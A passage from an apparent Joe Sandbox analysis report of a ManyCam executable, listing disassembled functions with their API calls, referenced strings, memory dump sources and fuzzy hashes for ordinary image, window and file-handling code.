Instruction Fuzzy Hash: 46C13230901158EFDB24DFA4D859BADB7B1AF48304F2481DED50A6B382CB795E84CF55

Function 0050F480 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

_mAnnnYca@aM_, xrefs: 0050F6D0

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID: _mAnnnYca@aM_
API String ID: 0-3995523097
Opcode ID: d785f2585446dacc2ea26e3cd8fc161da3962a7f22c1aaa8b953898c058bd1e2
Instruction ID: 03f3f580957dd8d98fe766c3b08c4ea85ac32c8ace33bb22cf726ef2f4b4dfae
Opcode Fuzzy Hash: d785f2585446dacc2ea26e3cd8fc161da3962a7f22c1aaa8b953898c058bd1e2
Instruction Fuzzy Hash: 51A12CB1A4021A9FDB24DF54DC95FEEB775BF88304F1082E8E50967281DB31AA80CF91

Function 0050F080 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

SetFileAttributesW.KERNEL32(00000000,00000080,?,?,744843B1), ref: 0050F10D
CreateFileW.KERNEL32(00000000,001F01FF,00000000,00000000,00000003,00000000,00000000,?,?,744843B1), ref: 0050F134

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CMCEData::FlushToDisk(), xrefs: 0050F0B1
_mAnnnYca@aM_, xrefs: 0050F18D
h-Z, xrefs: 0050F16C
Couldn't open a file to flush MCE data to disk: %s, xrefs: 0050F156

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Fileclock$AllocatorAttributesCreateDebugHeap
String ID: CMCEData::FlushToDisk()$Couldn't open a file to flush MCE data to disk: %s$_mAnnnYca@aM_$h-Z
API String ID: 3526691834-3819927071
Opcode ID: c250c6d348c6a577bac95d433ffd8b1c35fd8412c96bf1b7ac210eb878312dd3
Instruction ID: 3fd365fe576ff881e40a2fa1f18d14bb5eaede2e8814e90bc3ea97a76a5821e3
Opcode Fuzzy Hash: c250c6d348c6a577bac95d433ffd8b1c35fd8412c96bf1b7ac210eb878312dd3
Instruction Fuzzy Hash: 62517C70E44318ABEB24DB64DC46BEAB774FB94700F0082ADE619672C1DF792A84CF54

Function 00C282A0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 98COMMON

Download Yara Rule

Strings

Key may not start with '-', xrefs: 00C282B7
Missing ':', xrefs: 00C28326
icvYMLParseKey, xrefs: 00C282BC, 00C28303, 00C2832B, 00C2838D
Inner function failed., xrefs: 00C28388
.\cxpersistence.cpp, xrefs: 00C282B2, 00C282F9, 00C28321, 00C28383
An empty key, xrefs: 00C282FE

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Errorsprintf
String ID: .\cxpersistence.cpp$An empty key$Inner function failed.$Key may not start with '-'$Missing ':'$icvYMLParseKey
API String ID: 1411199588-3902335945
Opcode ID: 753a8d07c339ee42a4bfbaef15e40b2ca29b0e734f60974cab301aff0cb0c6e4
Instruction ID: c7a21f171ab6703b740940d0b5e2883c038cb9a503f3498cc420b6d14feb6ae3
Opcode Fuzzy Hash: 753a8d07c339ee42a4bfbaef15e40b2ca29b0e734f60974cab301aff0cb0c6e4
Instruction Fuzzy Hash: A8214277B052182BDB21251C7C82B7BE3CDDB51725F4805FAF904DB7A2EC829D4D41A6

Function 00BA2280 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

cvAlloc.GLU32(00000114), ref: 00BA229A
cvInitMatNDHeader.GLU32(00000000,?,?,?,00000000), ref: 00BA22D7
cvGetErrStatus.GLU32 ref: 00BA22DF
cvGetErrStatus.GLU32 ref: 00BA22A8

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(FFFFFF2D,cvCreateMatNDHeader,non-positive or too large number of dimensions,.\cxarray.cpp,0000016E), ref: 00BA2311
cvGetErrStatus.GLU32 ref: 00BA2319
cvReleaseMat.GLU32(?), ref: 00BA2327

Strings

cvCreateMatNDHeader, xrefs: 00BA22C0, 00BA2307
.\cxarray.cpp, xrefs: 00BA22B6, 00BA22FD
non-positive or too large number of dimensions, xrefs: 00BA2302
Inner function failed., xrefs: 00BA22BB

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$AllocErrorHeaderInitReleasemalloc
String ID: .\cxarray.cpp$Inner function failed.$cvCreateMatNDHeader$non-positive or too large number of dimensions
API String ID: 1466104906-341057531
Opcode ID: ad149f4de9f9ed04675417c0e7a4cbd37c3a14c3ac47b05beced1af8319df5f9
Instruction ID: ebb9325a1e9775075e4e1fe9ed8f961fabef79b3e788479a0204673824a63274
Opcode Fuzzy Hash: ad149f4de9f9ed04675417c0e7a4cbd37c3a14c3ac47b05beced1af8319df5f9
Instruction Fuzzy Hash: D2116BB13483026BDA10AB59DC43F5FF7D4DF92BA1F1005BAFA51DA2C1F6A0E44042A6

Function 00423AA0 Relevance: 18.2, APIs: 12, Instructions: 179windowCOMMON

Download Yara Rule

APIs

GetCursorInfo.USER32(00000014), ref: 00423AC4
ScreenToClient.USER32(?,?), ref: 00423AD8

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetSystemMetrics.USER32(0000000A), ref: 00423B06

Part of subcall function 00425710: PtInRect.USER32(?,?,j:B), ref: 00425723

Part of subcall function 004256C0: ClientToScreen.USER32(?,?), ref: 004256D1

Part of subcall function 0040F0F0: SendMessageW.USER32(-0000012F,00000147,00000000,00000000), ref: 0040F106

GetDC.USER32(?), ref: 00423BA1
wcslen.MSVCR80 ref: 00423BBB
GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 00423BD3
ReleaseDC.USER32(?,?), ref: 00423BEA
GetSysColor.USER32(00000008), ref: 00423C1B
GetSysColor.USER32(00000005), ref: 00423C29
GetFocus.USER32 ref: 00423C35
GetSysColor.USER32(0000000E), ref: 00423C5D
GetSysColor.USER32(0000000D), ref: 00423C6B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Color$Client$RectScreen$CursorExtentFocusInfoMessageMetricsPoint32ReleaseSendSystemTextwcslen
String ID:
API String ID: 519587954-0
Opcode ID: 68b8d88c38b866ff486e018222d65e7177b0f41f6485d8fbd56d5fb62895d0cc
Instruction ID: f22ce369a6aeaae062fb2a03bc0b823762dbe8249e9956e86251b05f68baaa2a
Opcode Fuzzy Hash: 68b8d88c38b866ff486e018222d65e7177b0f41f6485d8fbd56d5fb62895d0cc
Instruction Fuzzy Hash: E6711A71A00528DBDB54DB59DC94BADB3B5FF88309F00819EE64AB7241DF346A84CF94

Function 0041D3A0 Relevance: 18.2, APIs: 12, Instructions: 178COMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(?,744843B1,744843B1,744843B1), ref: 0041D427
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,744843B1,744843B1,744843B1), ref: 0041D453
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,?,744843B1,744843B1,744843B1), ref: 0041D478
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,?,744843B1,744843B1,744843B1), ref: 0041D48C
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,744843B1,744843B1,744843B1), ref: 0041D4B3
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,744843B1,744843B1,744843B1), ref: 0041D4DE
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,744843B1,744843B1,744843B1), ref: 0041D506
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,744843B1,744843B1,744843B1), ref: 0041D532
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041D557
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041D56B
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041D592
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041D5BD

Part of subcall function 00412790: BitBlt.GDI32(FFFFFFFF,?,?,?,?,?,?,?,00CC0020), ref: 00412805

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$C__@@Draw@U3@_Utag$Width@$Height@$ClientRect
String ID:
API String ID: 800822957-0
Opcode ID: 48e4cdac09fd2584f099d7bad379a9fdd4af48967efff26b200e1ab649f63517
Instruction ID: 8b69319c21aec3ddee00cb00959702adc85bce415fb2168130725632d218664d
Opcode Fuzzy Hash: 48e4cdac09fd2584f099d7bad379a9fdd4af48967efff26b200e1ab649f63517
Instruction Fuzzy Hash: C671B3B5D002099FDB18EFA8D991BEEBBB5AF48304F20412EE515B7381DB342A45CF65

Function 00406B70 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 325stringCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,00000000,00000008), ref: 00406BCD
lstrcmpiW.KERNEL32(00000000,static), ref: 00406BE4

Part of subcall function 00407320: GetWindowLongW.USER32(-00000004,000000F0), ref: 00407331

Part of subcall function 00406840: GetWindowLongW.USER32(?,000000F0), ref: 0040684F

LoadCursorW.USER32(00000000,00007F89), ref: 00406C72
GetStockObject.GDI32(0000000D), ref: 00406CC9
memset.MSVCR80 ref: 00406D0D
CreateFontIndirectW.GDI32(00000000), ref: 00406D7E

Strings

Anchor Color, xrefs: 00406FE4
static, xrefs: 00406BDB
Software\Microsoft\Internet Explorer\Settings, xrefs: 00406F6A
Anchor Color Visited, xrefs: 00407045

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: LongWindow$ClassCreateCursorFontIndirectLoadNameObjectStocklstrcmpimemset
String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings$static
API String ID: 537339791-2739629574
Opcode ID: 99ecedde21c05c3d22bbeafe7e2b67f4cdb7fe62b879cd42fd35616c0f2689b9
Instruction ID: 199e44e7be4628ee2e688c610ba56af09b0a08d7a3a9a70c30624c5daa12086b
Opcode Fuzzy Hash: 99ecedde21c05c3d22bbeafe7e2b67f4cdb7fe62b879cd42fd35616c0f2689b9
Instruction Fuzzy Hash: 45E14970A042689FDB64DB65CC49BAEB7B1AF04304F1042EAE54A772D2DB346EC4CF59

Function 004AAFD0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 254COMMON

Download Yara Rule

Strings

No such effect found in stack, xrefs: 004AB072
CEffectStack::SelectEffect, xrefs: 004AAFF8
AN, xrefs: 004AAFEC
Effect pointer is NULL., xrefs: 004AB018

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorDebugHeapfflushfwprintf
String ID: CEffectStack::SelectEffect$Effect pointer is NULL.$No such effect found in stack$AN
API String ID: 2739697835-3664681806
Opcode ID: 221cc7908e8e233be853d1dd1845420aec90c9ea438a58ddf34726c8fe8ac0e0
Instruction ID: 60628f8e65fa033cdeac9a30f19292ee3b75e2ecbf0df95034a13fcf3e9652a5
Opcode Fuzzy Hash: 221cc7908e8e233be853d1dd1845420aec90c9ea438a58ddf34726c8fe8ac0e0
Instruction Fuzzy Hash: FEB13A70E00208DFDB14DFA9C895BEEBBB5FF59314F10811EE415AB292DB786905CB98

Function 005139F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,?,?,744843B1), ref: 00513A57
~_Mpunct.LIBCPMTD ref: 00513AF1

Part of subcall function 004166C0: ?DestroyFrames@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166D3
Part of subcall function 004166C0: ?Destroy@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166DB

??2@YAPAXI@Z.MSVCR80(000001C4,352x288,?,?,?,?,00000000,?,?,744843B1), ref: 00513B1A
??0CxImage@@QAE@ABV0@_N11@Z.CXIMAGECRT(?,00000001,00000001,00000001,00000000,?,?,744843B1), ref: 00513B48
~_Mpunct.LIBCPMTD ref: 00513B85
_DebugHeapAllocator.LIBCPMTD ref: 00513A74

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 0050DF50: _DebugHeapAllocator.LIBCPMTD ref: 0050DF91
Part of subcall function 0050DF50: _DebugHeapAllocator.LIBCPMTD ref: 0050DFAD

_DebugHeapAllocator.LIBCPMTD ref: 00513BCC

Strings

352x288, xrefs: 00513BF0
352x288, xrefs: 00513A98
%d.png, xrefs: 00513A34

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@$Mpunct$??2@DestroyDestroy@Frames@N11@V0@_
String ID: %d.png$352x288$352x288
API String ID: 1128305235-4221946874
Opcode ID: 3d3a3092ae457ba20b6bf654cef30ca65db4711d383323e92277891cfebd2fe8
Instruction ID: 81933645b3eb8f3328e915e61d60693adeebe1464ca0442654379e8e1d16d656
Opcode Fuzzy Hash: 3d3a3092ae457ba20b6bf654cef30ca65db4711d383323e92277891cfebd2fe8
Instruction Fuzzy Hash: F07116B0D01259DADB24EB64D899BEEBBB4BB04304F1086EDE419A72C1DB745F84CF94

Function 00BA2070 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

cvAlloc.GLU32(0000001C), ref: 00BA20E4
cvGetErrStatus.GLU32 ref: 00BA20F2
cvError.GLU32(FFFFFF37,cvCreateMatHeader,Non-positive width or height,.\cxarray.cpp,00000088), ref: 00BA2188
cvGetErrStatus.GLU32 ref: 00BA2190
cvReleaseMat.GLU32(?), ref: 00BA219E

Strings

.\cxarray.cpp, xrefs: 00BA20C9, 00BA2100, 00BA2174
Non-positive width or height, xrefs: 00BA2179
Invalid matrix type, xrefs: 00BA20CE
Inner function failed., xrefs: 00BA2105
cvCreateMatHeader, xrefs: 00BA20D3, 00BA210A, 00BA217E

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$AllocErrorRelease
String ID: .\cxarray.cpp$Inner function failed.$Invalid matrix type$Non-positive width or height$cvCreateMatHeader
API String ID: 3584650851-3203345803
Opcode ID: bf458d4ae69ef160433b760062a2ab50ab5e17b6aba46be8f19c948806fd10ff
Instruction ID: dcbae89358fa05b6aede633f463a1690ee2a4d1839be0abcc8b0b9366557918d
Opcode Fuzzy Hash: bf458d4ae69ef160433b760062a2ab50ab5e17b6aba46be8f19c948806fd10ff
Instruction Fuzzy Hash: 4331F7727487065BD7248F6CEC8261AB2D1EB61B61F144B7EF6A2E6AC0E7B0E4044751

Function 005047C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,744843B1,?,?,?,00000000,00538D49,000000FF,?,0050405E,?), ref: 005047EA
??Bid@locale@std@@QAEIXZ.MSVCP80(?,?,?,00000000,00538D49,000000FF,?,0050405E), ref: 00504804
?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(00538D49,?,?,?,00000000,00538D49,000000FF,?,0050405E), ref: 00504814
??1_Lockit@std@@QAE@XZ.MSVCP80(00585C98,00585C98), ref: 00504898

Strings

^@P, xrefs: 00504811
bad cast, xrefs: 00504844

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
String ID: ^@P$bad cast
API String ID: 2261832285-3230263104
Opcode ID: 3b2a1131cef9067ba1ac1022581be8c82768a399d86bdfc45b63dcb7fc16c2e6
Instruction ID: 824bbbae0ea1dedba38b35fd60e665a14d2ea96d15b6e9388a122e9d75c37290
Opcode Fuzzy Hash: 3b2a1131cef9067ba1ac1022581be8c82768a399d86bdfc45b63dcb7fc16c2e6
Instruction Fuzzy Hash: 4631F9B4D04209DFDB08DFA5E845AAEBBB5FF58310F108A2AE922A33D0DB745905DF50

Function 00499B60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,744843B1,?,00495099,00531878,000000FF,?,004968AA,00495099,?), ref: 00499B8A
??Bid@locale@std@@QAEIXZ.MSVCP80(?,00495099,00531878,000000FF,?,004968AA,00495099,?), ref: 00499BA5
?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(?,?,00495099,00531878,000000FF,?,004968AA,00495099,?), ref: 00499BB5
??1_Lockit@std@@QAE@XZ.MSVCP80(?,?,00495099), ref: 00499C3A

Strings

bad cast, xrefs: 00499BE6

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
String ID: bad cast
API String ID: 2261832285-3145022300
Opcode ID: e8d9317ff7b667e4345a0d9ab4755c0ed9f6fbdd2f1abd810e1704a9855df511
Instruction ID: ac16ab481d142800d0c9b8599a912b67046f6ada141286fa39e373667d809841
Opcode Fuzzy Hash: e8d9317ff7b667e4345a0d9ab4755c0ed9f6fbdd2f1abd810e1704a9855df511
Instruction Fuzzy Hash: 9A31FDB4D04219DFDF04DF98EC44AAEBBB5FB58310F10862AE922A33A0D7785905DF55

Function 00403D80 Relevance: 16.9, APIs: 11, Instructions: 407COMMON

Download Yara Rule

APIs

_CIpow.MSVCR80 ref: 00403DCF
cvSetImageROI.CXCORE099(?), ref: 00403E20
cvSetImageROI.CXCORE099(?), ref: 00403E3E
cvSetImageROI.CXCORE099(?), ref: 00403E5C
cvSet.CXCORE099(?), ref: 00403E87
cvSet.CXCORE099(?), ref: 00403EB2
cvSet.CXCORE099(?), ref: 00403EEA
cvGEMM.CXCORE099(?,?), ref: 00403F4E
cvGEMM.CXCORE099(?,?), ref: 00403F7F
cvGEMM.CXCORE099(?,?), ref: 0040405F
cvGEMM.CXCORE099(?,?), ref: 00404090

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image$Ipow
String ID:
API String ID: 2361920412-0
Opcode ID: ae5365c12a2100a1903be52b5529a37c0f6dfca9bd181234086edb2fe99e62fb
Instruction ID: 2a68433d30ada8fa05db26af022ad57aeecc5f41bf496e9e98d865bd8f4dde78
Opcode Fuzzy Hash: ae5365c12a2100a1903be52b5529a37c0f6dfca9bd181234086edb2fe99e62fb
